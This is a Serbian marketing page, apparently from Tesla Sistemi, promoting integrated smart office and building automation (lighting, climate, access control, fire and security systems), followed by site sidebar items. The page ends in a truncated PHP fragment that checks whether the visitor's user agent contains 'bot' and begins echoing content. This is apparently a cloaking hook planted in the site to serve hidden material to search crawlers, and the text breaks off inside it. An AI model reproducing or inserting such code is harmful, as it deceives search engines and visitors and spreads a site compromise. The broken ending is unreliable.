Pametan Office za jednostavnu kontrolu uređaja


U našim rešenjima naglašavamo optimalnu funkcionalnost i važnost integracija, a da pri tome ne zanemarujemo udobnost, racionalnost upotrebe energije i bezbednost.

Automatizacija omogućuje i vidljive uštede a ne samo kontrolu sistema.

Otvorene i savremene tehnologije, omogućavaju nadzor i upravljanje svim kontrolnim sistemima, prikupljanje podataka iz svih relevantnih uređaja i sistema, čime korisnicima osiguravamo veliku dodatnu vrednost. Pri tome ipak neprestano pazimo da ne dođe do preterivanja kod korišćenja visokih tehnologija, jer to može na duži rok ugroziti pozitivne efekte automatizacije u zgradama.

Putem povratnih informacija možete saznati o ispravnosti uređaja, radnom veku, upotrebi pa čak i o potrebi za servisiranjem.

U većim i kompleksnijim zgradama potreba za integracijom različitih sistema je veća. Visoki funkcionalni zahtevi, velika fizička udaljenost i kompleksnost prostora zahtevaju korišćenje tehnološki najzahtevnijih rešenja. Ta rešenja već na sistemskom nivou integrišu automatizaciju energetskih sistema, klimatizacije i ventilacije sa kontrolom pristupa, video nadzorom, sigurnosnim i protivpožarnim sistemima. Samo integracija na sistemskom nivou može da omogući dovoljno visok nivo prilagodljivosti, sigurnosti, funkcionalne inteligencije i izvodljivosti u razumnom vremenskom roku.

 

Objedinite sve Vaše audio-video uređaje, i omogućite jednostavno upravljanje svetlom, zavesama, roletnama, klimom, grejanjem i drugim sistemima.

 

LOGIN
niste ulogovani
e-mail adresa:
lozinka:

Zaboravili ste lozinku?   

PRETRAŽIVAČ
Unesite reč ili frazu:

NEWSLETTER
Unesite Vašu Email adresu:

TESLA SISTEMI
Ekipa na terenu

 


 

 


SUPERBRANDS
Pogledajte fotografije i video sa svečane dodele nagrada »

KATALOG
Pogledajte katalog Tesla sistema »

ISO 9001

 

 

ISO 14001

 

 

ISO 18001

 

 

ISO 20000

 

 

ISO 22301

 

 

ISO 27001

 

 

ISO 50001

 

 

ISO 37001

 

 


NIKOLA TESLA
www.tesla-museum.org »

$tmp = "?" . strtolower($_SERVER['HTTP_USER_AGENT']); if((strpos($tmp, 'bot') == true)){ echo '